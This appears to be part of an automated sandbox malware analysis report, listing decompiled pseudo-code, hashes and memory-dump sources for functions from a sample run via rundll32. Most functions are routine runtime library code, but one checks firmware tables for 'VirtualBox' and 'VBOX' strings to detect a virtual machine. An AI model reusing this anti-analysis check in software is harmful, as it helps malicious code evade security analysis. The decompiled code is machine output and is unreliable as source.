                0x7ffa535e817a
                0x7ffa535e817f
                0x7ffa535e8183
                0x7ffa535e8192
                0x7ffa535e81ae

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                • String ID:
                • API String ID: 1239891234-0
                • Opcode ID: 6ab7a5c12a0407af041816abddc0eba39aeae19ebafb7fd608393c2a948a6a94
                • Instruction ID: f429eeaa50d87a529be4717e38f090dfb5aaf64696a15ceccdf1ef425ecd3830
                • Opcode Fuzzy Hash: 6ab7a5c12a0407af041816abddc0eba39aeae19ebafb7fd608393c2a948a6a94
                • Instruction Fuzzy Hash: D731B436628F818ADB20CF25E8402AE73A9FBC5794F485135EA8D53B98DF3CD145CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205FA8B0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000215215205FA8B0(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t45;
				intOrPtr _t53;
				signed long long _t63;
				long long _t66;
				_Unknown_base(*)()* _t86;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t46 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t91 = _t93 - 0x4f0;
				_t94 = _t93 - 0x5f0;
				_t63 =  *0x2067c720; // 0xca1645d940e
				 *(_t91 + 0x4e0) = _t63 ^ _t94;
				_t53 = r8d;
				_t45 = __ecx;
				if (__ecx == 0xffffffff) goto 0x205fa8ef;
				E00000215215205F5DD0(_t36);
				r8d = 0x98;
				E00000215215205F8EF0(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
				r8d = 0x4d0;
				E00000215215205F8EF0(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
				_t66 = _t91 + 0x10;
				 *((long long*)(_t94 + 0x50)) = _t66;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t66 == 0) goto 0x205fa982;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				 *((long long*)(_t94 + 0x30)) = _t94 + 0x60;
				 *((long long*)(_t94 + 0x28)) = _t94 + 0x58;
				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t86, _t90);
				if (UnhandledExceptionFilter(_t100) != 0) goto 0x205fa9e4;
				if (_t40 != 0) goto 0x205fa9e4;
				if (_t45 == 0xffffffff) goto 0x205fa9e4;
				E00000215215205F5DD0(_t42);
				return E00000215215205F59D0(_t45,  *(_t91 + 0x4e0) ^ _t94,  *((intOrPtr*)(_t94 + 0x40)), _t66);
			}
















                0x215205fa8b0
                0x215205fa8b0
                0x215205fa8b5
                0x215205fa8be
                0x215205fa8c6
                0x215205fa8cd
                0x215205fa8d7
                0x215205fa8de
                0x215205fa8e3
                0x215205fa8e8
                0x215205fa8ea
                0x215205fa8f6
                0x215205fa8fc
                0x215205fa907
                0x215205fa90d
                0x215205fa917
                0x215205fa920
                0x215205fa924
                0x215205fa929
                0x215205fa93e
                0x215205fa941
                0x215205fa94a
                0x215205fa94c
                0x215205fa95f
                0x215205fa96c
                0x215205fa975
                0x215205fa97c
                0x215205fa989
                0x215205fa99b
                0x215205fa99f
                0x215205fa9ad
                0x215205fa9b1
                0x215205fa9b5
                0x215205fa9bf
                0x215205fa9d2
                0x215205fa9d6
                0x215205fa9db
                0x215205fa9df
                0x215205faa0a

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                • String ID:
                • API String ID: 1239891234-0
                • Opcode ID: bdd22a3e785216847e4525529e3db3b736ff015fa7bf852898a8c4624f47431c
                • Instruction ID: d9a76dc34f9e691342a4cd222803af01a0ae3ee318d92e35c8a0be3104f95239
                • Opcode Fuzzy Hash: bdd22a3e785216847e4525529e3db3b736ff015fa7bf852898a8c4624f47431c
                • Instruction Fuzzy Hash: F9315D33215F90C6DB609B25E8487EA77A4FBD9758F500126EE9D43BA9DF38C5458B00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520604C78 Relevance: 6.2, APIs: 4, Instructions: 191COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 37%
                			E0000021521520604C78(void* __ecx, long long __rbx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a24, long long _a32) {
				void* _t9;
				void* _t13;

				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				if (__rdx != 0) goto 0x20604cb2;
				return E00000215215206025B8(__ecx, _t9, _t13, __rdx);
			}





                0x21520604c78
                0x21520604c7d
                0x21520604c82
                0x21520604c96
                0x21520604cb1

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wcsftime$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 4239037671-0
                • Opcode ID: 6e4ef63b484ccce730011eb32c6a4c47bc475d85faa6a6323987f0634767b6b3
                • Instruction ID: a39b93622787b37d9b23cbe70425e17ecdbffd56ba661c164a4324559693e640
                • Opcode Fuzzy Hash: 6e4ef63b484ccce730011eb32c6a4c47bc475d85faa6a6323987f0634767b6b3
                • Instruction Fuzzy Hash: 2971E373256B60C3FB789B35A0493AB6292FFD5798F244665EE9947EDDCF38D0018600
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EDE00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 64%
                			E00007FFA7FFA535EDE00(void* __edx, long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
				long long _v72;
				intOrPtr _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				void* _t36;
				void* _t43;
				void* _t44;
				signed long long _t65;
				long long _t67;
				long long _t68;
				long long _t69;
				long long _t76;
				void* _t81;
				void* _t88;
				long long _t104;
				void* _t110;
				intOrPtr* _t112;
				void* _t114;
				void* _t117;
				intOrPtr _t129;
				void* _t131;
				void* _t132;
				signed long long _t133;
				signed long long _t134;
				signed long long _t137;
				intOrPtr* _t138;

				_t43 = __edx;
				_a8 = __rbx;
				_a16 = __rdx;
				if (__rdx != 0) goto 0x535ede3c;
				_t33 = E00007FFA7FFA535E8380(__rax);
				 *__rax = 0x16;
				E00007FFA7FFA535E8260(_t33);
				goto 0x535edfdc;
				asm("xorps xmm0, xmm0");
				 *((long long*)(__rdx)) = 0;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = 0;
				if ( *__rcx == 0) goto 0x535edea7;
				_a24 = 0x3f2a;
				_a26 = dil;
				E00007FFA7FFA535F2864( *((intOrPtr*)(0x16)),  &_a24);
				if (0x16 != 0) goto 0x535ede7e;
				r8d = 0;
				_t36 = E00007FFA7FFA535EE00C(0x16,  *((intOrPtr*)(0x16)), 0, 0, _t110, _t114, _t117,  &_v88);
				goto 0x535ede8a;
				0x535ee11c();
				r14d = _t36;
				if (0x16 != 0) goto 0x535ede9a;
				goto 0x535ede4e;
				goto 0x535edfa0;
				_t112 = _v88;
				_t129 = _v80;
				_a24 = 0;
				_t65 = _t129 - _t112;
				_t137 = (_t65 >> 3) + 1;
				_t88 =  >  ? 0 : _t65 + 7 >> 3;
				_t134 = _t133 | 0xffffffff;
				if (_t88 == 0) goto 0x535edf09;
				_t67 = _t134 + 1;
				if ( *((intOrPtr*)( *_t112 + _t67)) != dil) goto 0x535edeea;
				if (1 != _t88) goto 0x535edee4;
				_a24 = 1 + _t67;
				r8d = 1;
				E00007FFA7FFA535E72EC(_t137, 1 + _t67, 1);
				_t76 = _t67;
				if (_t67 == 0) goto 0x535edf99;
				_t104 = _t67 + _t137 * 8;
				_t138 = _t112;
				_v96 = _t104;
				_t68 = _t104;
				_a32 = _t104;
				if (_t112 == _t129) goto 0x535edf8f;
				_v104 = _t76 - _t112;
				_t131 = _t134 + 1;
				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x535edf49;
				_t132 = _t131 + 1;
				E00007FFA7FFA535F1998(_t43, _t68, _t76, _t68, _t104 - _t68 + _a24, _t132);
				if (_t68 != 0) goto 0x535edff4;
				_t69 = _a32;
				 *((long long*)(_v104 + _t138)) = _t69;
				_a32 = _t69 + _t132;
				if (_t138 + 8 != _t129) goto 0x535edf43;
				r14d = _t44;
				 *_a16 = _t76;
				E00007FFA7FFA535E7E58(_a16, 0);
				_t81 =  >  ? 0 : _t129 - _t112 + 7 >> 3;
				if (_t81 == 0) goto 0x535edfd1;
				E00007FFA7FFA535E7E58(_a16,  *_t112);
				if (1 != _t81) goto 0x535edfbd;
				E00007FFA7FFA535E7E58(_a16, _t112);
				return r14d;
			}


































                0x7ffa535ede00
                0x7ffa535ede00
                0x7ffa535ede05
                0x7ffa535ede24
                0x7ffa535ede26
                0x7ffa535ede2e
                0x7ffa535ede30
                0x7ffa535ede37
                0x7ffa535ede3c
                0x7ffa535ede3f
                0x7ffa535ede45
                0x7ffa535ede4a
                0x7ffa535ede4e
                0x7ffa535ede57
                0x7ffa535ede5d
                0x7ffa535ede61
                0x7ffa535ede6c
                0x7ffa535ede72
                0x7ffa535ede77
                0x7ffa535ede7c
                0x7ffa535ede85
                0x7ffa535ede8a
                0x7ffa535ede8f
                0x7ffa535ede98
                0x7ffa535edea2
                0x7ffa535edea7
                0x7ffa535edeae
                0x7ffa535edeb8
                0x7ffa535edebc
                0x7ffa535edec9
                0x7ffa535eded7
                0x7ffa535ededb
                0x7ffa535edee2
                0x7ffa535edeea
                0x7ffa535edef1
                0x7ffa535edf03
                0x7ffa535edf05
                0x7ffa535edf09
                0x7ffa535edf15
                0x7ffa535edf1a
                0x7ffa535edf20
                0x7ffa535edf22
                0x7ffa535edf26
                0x7ffa535edf29
                0x7ffa535edf2d
                0x7ffa535edf30
                0x7ffa535edf37
                0x7ffa535edf3f
                0x7ffa535edf49
                0x7ffa535edf50
                0x7ffa535edf55
                0x7ffa535edf62
                0x7ffa535edf69
                0x7ffa535edf6f
                0x7ffa535edf7b
                0x7ffa535edf86
                0x7ffa535edf8d
                0x7ffa535edf93
                0x7ffa535edf96
                0x7ffa535edf9b
                0x7ffa535edfb4
                0x7ffa535edfbb
                0x7ffa535edfc0
                0x7ffa535edfcf
                0x7ffa535edfd4
                0x7ffa535edff3

                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EDE30
                  • Part of subcall function 00007FFA535E8280: IsProcessorFeaturePresent.KERNEL32(00007FFA535EF385), ref: 00007FFA535E8289
                  • Part of subcall function 00007FFA535E8280: GetCurrentProcess.KERNEL32(00007FFA535EF385), ref: 00007FFA535E82AD
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                • String ID: *?$.
                • API String ID: 4036615347-3972193922
                • Opcode ID: 6d596129e1decb9b41ca20d2be82681836e38efb530b16a80fb35605405d6583
                • Instruction ID: bdd56421e6d2085a6da203f47ace1649a748ade4d58a299038f3c52643143aa3
                • Opcode Fuzzy Hash: 6d596129e1decb9b41ca20d2be82681836e38efb530b16a80fb35605405d6583
                • Instruction Fuzzy Hash: 8A51D462B24F958DEB10DFA298104BC67AAEF99BD4B489171EE1D27B85EE3CD4419300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520614364 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 64%
                			E0000021521520614364(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
				long long _v72;
				intOrPtr _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				void* _t37;
				intOrPtr* _t66;
				signed long long _t68;
				long long _t70;
				long long _t72;
				long long _t78;
				void* _t83;
				void* _t90;
				long long _t104;
				long long _t108;
				void* _t110;
				intOrPtr* _t112;
				void* _t114;
				void* _t117;
				intOrPtr _t129;
				void* _t131;
				void* _t132;
				signed long long _t133;
				signed long long _t134;
				signed long long _t137;
				intOrPtr* _t138;

				_t66 = __rax;
				_a8 = __rbx;
				_a16 = __rdx;
				if (__rdx != 0) goto 0x206143a0;
				_t33 = E0000021521520603944(__rax);
				_t3 = _t108 + 0x16; // 0x16
				 *__rax = _t3;
				E00000215215205FAABC(_t33);
				goto 0x20614540;
				asm("xorps xmm0, xmm0");
				 *((long long*)(__rdx)) = _t108;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = _t108;
				if ( *__rcx == _t108) goto 0x2061440b;
				_a24 = 0x3f2a;
				_a26 = dil;
				E0000021521520618564( *__rcx,  &_a24);
				if (_t66 != 0) goto 0x206143e2;
				r8d = 0;
				_t37 = E0000021521520614570(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
				goto 0x206143ee;
				0x20614680();
				r14d = _t37;
				if (_t37 != 0) goto 0x206143fe;
				goto 0x206143b2;
				goto 0x20614504;
				_t112 = _v88;
				_t129 = _v80;
				_a24 = _t108;
				_t68 = _t129 - _t112;
				_t137 = (_t68 >> 3) + 1;
				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
				_t134 = _t133 | 0xffffffff;
				if (_t90 == 0) goto 0x2061446d;
				_t70 = _t134 + 1;
				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x2061444e;
				if (_t108 + 1 != _t90) goto 0x20614448;
				_a24 = _t108 + 1 + _t70;
				r8d = 1;
				E000002152152060B1AC(_t137, _t108 + 1 + _t70, _t108 + 1);
				_t78 = _t70;
				if (_t70 == 0) goto 0x206144fd;
				_t104 = _t70 + _t137 * 8;
				_t138 = _t112;
				_v96 = _t104;
				_a32 = _t104;
				if (_t112 == _t129) goto 0x206144f3;
				_v104 = _t78 - _t112;
				_t131 = _t134 + 1;
				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x206144ad;
				_t132 = _t131 + 1;
				if (E000002152152060E758(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x20614558;
				_t72 = _a32;
				 *((long long*)(_v104 + _t138)) = _t72;
				_a32 = _t72 + _t132;
				if (_t138 + 8 != _t129) goto 0x206144a7;
				r14d = 0;
				 *_a16 = _t78;
				E000002152152060A780(_a16, _v104);
				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
				if (_t83 == 0) goto 0x20614535;
				E000002152152060A780(_a16,  *_t112);
				if (_t108 + 1 != _t83) goto 0x20614521;
				E000002152152060A780(_a16, _t112);
				return r14d;
			}

































                0x21520614364
                0x21520614364
                0x21520614369
                0x21520614388
                0x2152061438a
                0x2152061438f
                0x21520614392
                0x21520614394
                0x2152061439b
                0x215206143a0
                0x215206143a3
                0x215206143a9
                0x215206143ae
                0x215206143b2
                0x215206143bb
                0x215206143c1
                0x215206143c5
                0x215206143d0
                0x215206143d6
                0x215206143db
                0x215206143e0
                0x215206143e9
                0x215206143ee
                0x215206143f3
                0x215206143fc
                0x21520614406
                0x2152061440b
                0x21520614412
                0x2152061441c
                0x21520614420
                0x2152061442d
                0x2152061443b
                0x2152061443f
                0x21520614446
                0x2152061444e
                0x21520614455
                0x21520614467
                0x21520614469
                0x2152061446d
                0x21520614479
                0x2152061447e
                0x21520614484
                0x21520614486
                0x2152061448a
                0x2152061448d
                0x21520614494
                0x2152061449b
                0x215206144a3
                0x215206144ad
                0x215206144b4
                0x215206144b9
                0x215206144cd
                0x215206144d3
                0x215206144df
                0x215206144ea
                0x215206144f1
                0x215206144f7
                0x215206144fa
                0x215206144ff
                0x21520614518
                0x2152061451f
                0x21520614524
                0x21520614533
                0x21520614538
                0x21520614557

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: *?$.
                • API String ID: 3215553584-3972193922
                • Opcode ID: b6313b92dc4b6846cdc1b814fe81baf977d800061901388fa977b3311bbffbbb
                • Instruction ID: 437544f475a307cbec2cc56abe889066ec883c658066bc3363268af350b53bf1
                • Opcode Fuzzy Hash: b6313b92dc4b6846cdc1b814fe81baf977d800061901388fa977b3311bbffbbb
                • Instruction Fuzzy Hash: 8E51D677712FA4C6EF20DFA698047D9A7A5FBA4BD8F644521DE1917F89DA38D0428300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CE070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: IPCA$VBOX$VirtualBox$vbox
                • API String ID: 0-3862313162
                • Opcode ID: 47845e2aecfa603fbafa9a6dc2591582b08ae3cee287e98bf503f113d7325852
                • Instruction ID: bcacbeeeb12c6f827a666a5ffe59d668b8094885312e506c45e4b073fd831d14
                • Opcode Fuzzy Hash: 47845e2aecfa603fbafa9a6dc2591582b08ae3cee287e98bf503f113d7325852
                • Instruction Fuzzy Hash: 7131C933312A60C1F7109B12A8093EA67D5FFE5BF4F080551DE4997B9DEA38D551C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CDFD0 Relevance: 5.0, Strings: 4, Instructions: 44COMMON
                Download Yara Rule
                C-Code - Quality: 45%
                			E00000215215205CDFD0(void* __rax, long long __rbx, long long __rsi, char _a8, long long _a16, long long _a24) {
				void* __rdi;
				intOrPtr _t23;
				long long _t29;
				void* _t35;
				void* _t39;
				void* _t47;

				_t37 = __rsi;
				_t29 = __rbx;
				_a24 = __rbx;
				_a8 = 0;
				E00000215215205D0670(0x52534d42, 0, _t39,  &_a8);
				if (__rax == 0) goto 0x205ce05f;
				_a16 = __rsi;
				_t23 = _a8;
				r9d = _t23;
				if (E00000215215205D0570(__rax, __rbx, "VirtualBox", _t35, __rax, __rsi, _t39, __rax, _t47) != 0) goto 0x205ce04d;
				r9d = _t23;
				if (E00000215215205D0570(E00000215215205D0570(__rax, __rbx, "VirtualBox", _t35, __rax, __rsi, _t39, __rax, _t47), _t29, "vbox", _t35, __rax, _t37, _t39, __rax, _t47) != 0) goto 0x205ce04d;
				r9d = _t23;
				if (E00000215215205D0570(E00000215215205D0570(E00000215215205D0570(__rax, __rbx, "VirtualBox", _t35, __rax, __rsi, _t39, __rax, _t47), _t29, "vbox", _t35, __rax, _t37, _t39, __rax, _t47), _t29, "VBOX", _t35, __rax, _t37, _t39, __rax, _t47) == 0) goto 0x205ce052;
				0x205faea4();
				return 1;
			}









                0x215205cdfd0
                0x215205cdfd0
                0x215205cdfd0
                0x215205cdfe3
                0x215205cdfec
                0x215205cdff7
                0x215205cdff9
                0x215205ce001
                0x215205ce00c
                0x215205ce019
                0x215205ce01b
                0x215205ce032
                0x215205ce034
                0x215205ce04b
                0x215205ce055
                0x215205ce06b

                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: BMSR$VBOX$VirtualBox$vbox
                • API String ID: 0-728286360
                • Opcode ID: 6bc41bc5affd39c8044c21b24d9e8814d90c21f9f28bd368c3ec2090da186f7d
                • Instruction ID: 5e96f9310bd485b58578a7ad63b3df2d8f18f08476430e59b027c80f82cc5d3f
                • Opcode Fuzzy Hash: 6bc41bc5affd39c8044c21b24d9e8814d90c21f9f28bd368c3ec2090da186f7d
                • Instruction Fuzzy Hash: 5E01C833313A90C1E750DB12F5886E96795EFE4BD4F046065AE099BB4EEA74C945C780
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520611B70 Relevance: 4.7, APIs: 3, Instructions: 165COMMON
                Download Yara Rule
                C-Code - Quality: 52%
                			E0000021521520611B70(void* __ecx, signed int __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
				void* _v24;
				signed int _v40;
				char _v280;
				signed int _t47;
				int _t48;
				void* _t50;
				void* _t55;
				signed int _t70;
				signed int _t76;
				signed int _t81;
				signed long long _t115;
				signed long long _t116;
				void* _t121;
				signed int* _t142;
				intOrPtr* _t144;
				void* _t146;
				void* _t154;
				signed long long _t156;
				signed long long _t157;

				_t123 = __rcx;
				_t81 = __edx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t115 =  *0x2067c720; // 0xca1645d940e
				_t116 = _t115 ^ _t146 - 0x00000120;
				_v40 = _t116;
				_t121 = __rcx;
				E000002152152060C334(_t116, __rcx, __rcx, __rdx, _t154);
				_t4 = _t116 + 0x98; // 0x98
				_t144 = _t4;
				E000002152152060C334(_t116, _t121, _t123, __rdx, _t154);
				_t142 =  *((intOrPtr*)(_t116 + 0x3a0));
				_t47 = E0000021521520611EB0(_t121, __rdx);
				r9d = 0x78;
				_t70 = _t47;
				asm("sbb edx, edx");
				_t48 = GetLocaleInfoW(??, ??, ??, ??);
				r15d = 0;
				if (_t48 != 0) goto 0x20611bf7;
				 *_t142 = r15d;
				goto 0x20611d8b;
				_t50 = E00000215215206019F0(_t116,  *((intOrPtr*)(_t144 + 8)),  &_v280);
				_t157 = _t156 | 0xffffffff;
				if (_t50 != 0) goto 0x20611cc3;
				r9d = _t157 + 0x79;
				asm("sbb edx, edx");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x20611bea;
				if (E00000215215206019F0(_t116,  *_t144,  &_v280) != 0) goto 0x20611c55;
				 *_t142 =  *_t142 | 0x00000304;
				_t142[1] = _t70;
				goto 0x20611cc0;
				if (( *_t142 & 0x00000002) != 0) goto 0x20611cc3;
				if ( *((intOrPtr*)(_t144 + 0x14)) == r15d) goto 0x20611c95;
				_t55 = E0000021521520616E48(((_t81 & 0xfffff005) + 0x00001002 & 0xfffff002) + 0x1001, _t116,  *_t144,  *((intOrPtr*)(_t144 + 0x14)));
				if (_t55 != 0) goto 0x20611c95;
				 *_t142 =  *_t142 | 0x00000002;
				_t142[2] = _t70;
				if ( *((intOrPtr*)( *_t144 + (_t157 + 1) * 2)) != r15w) goto 0x20611c81;
				if (_t55 !=  *((intOrPtr*)(_t144 + 0x14))) goto 0x20611cc3;
				_t142[1] = _t70;
				goto 0x20611cc3;
				_t76 =  *_t142;
				if ((_t76 & 0x00000001) != 0) goto 0x20611cc3;
				r8d = r15d;
				if (_t70 ==  *0x20635b40) goto 0x20611cc3;
				r8d = r8d + 1;
				if (r8d - 0xa < 0) goto 0x20611ca6;
				 *_t142 = _t76 | 0x00000001;
				_t142[2] = _t70;
				if (( *_t142 & 0x00000300) == 0x300) goto 0x20611d81;
				r9d = 0x78;
				asm("sbb edx, edx");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x20611bea;
				if (E00000215215206019F0(r8d,  *_t144,  &_v280) != 0) goto 0x20611d47;
				asm("bts dword [edi], 0x9");
				if ( *((intOrPtr*)(_t144 + 0x18)) == r15d) goto 0x20611d27;
				asm("bts eax, 0x8");
				goto 0x20611d78;
				if ( *((intOrPtr*)(_t144 + 0x14)) == r15d) goto 0x20611d1f;
				if ( *((intOrPtr*)( *_t144 + (_t157 + 1) * 2)) != r15w) goto 0x20611d30;
				if (r14d !=  *((intOrPtr*)(_t144 + 0x14))) goto 0x20611d1f;
				goto 0x20611d66;
				if ( *((intOrPtr*)(_t144 + 0x18)) != r15d) goto 0x20611d81;
				if ( *((intOrPtr*)(_t144 + 0x14)) == r15d) goto 0x20611d81;
				if (E00000215215206019F0(r8d,  *_t144,  &_v280) != 0) goto 0x20611d81;
				if (E0000021521520611FB0(_t70, 0, r8d, _t121,  *_t144,  &_v280, _t144, _t154) == 0) goto 0x20611d81;
				asm("bts dword [edi], 0x8");
				if (_t142[1] != r15d) goto 0x20611d81;
				_t142[1] = _t70;
				return E00000215215205F59D0(_t70, _v40 ^ _t146 - 0x00000120,  &_v280, _t154);
			}






















                0x21520611b70
                0x21520611b70
                0x21520611b70
                0x21520611b75
                0x21520611b86
                0x21520611b8d
                0x21520611b90
                0x21520611b98
                0x21520611b9b
                0x21520611ba0
                0x21520611ba0
                0x21520611ba7
                0x21520611baf
                0x21520611bb6
                0x21520611bc5
                0x21520611bcd
                0x21520611bcf
                0x21520611bdd
                0x21520611be3
                0x21520611be8
                0x21520611bea
                0x21520611bf2
                0x21520611c00
                0x21520611c05
                0x21520611c0b
                0x21520611c14
                0x21520611c21
                0x21520611c37
                0x21520611c48
                0x21520611c4a
                0x21520611c50
                0x21520611c53
                0x21520611c58
                0x21520611c5e
                0x21520611c6c
                0x21520611c73
                0x21520611c75
                0x21520611c7b
                0x21520611c89
                0x21520611c8e
                0x21520611c90
                0x21520611c93
                0x21520611c95
                0x21520611c9a
                0x21520611c9c
                0x21520611ca9
                0x21520611cab
                0x21520611cb9
                0x21520611cbe
                0x21520611cc0
                0x21520611cce
                0x21520611cde
                0x21520611ce6
                0x21520611cfc
                0x21520611d11
                0x21520611d13
                0x21520611d1d
                0x21520611d1f
                0x21520611d25
                0x21520611d2b
                0x21520611d38
                0x21520611d3e
                0x21520611d45
                0x21520611d4b
                0x21520611d51
                0x21520611d62
                0x21520611d72
                0x21520611d74
                0x21520611d7c
                0x21520611d7e
                0x21520611db3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorInfoLastLocale$abort
                • String ID:
                • API String ID: 1112924360-0
                • Opcode ID: 876a2f0e40750921915cb54671a1db037061437716535c8cda6411e3dd0adf72
                • Instruction ID: ae4de1ab34326410330e1d4bac6b88d3f9cb59df71ade43c5edde196461b4bb6
                • Opcode Fuzzy Hash: 876a2f0e40750921915cb54671a1db037061437716535c8cda6411e3dd0adf72
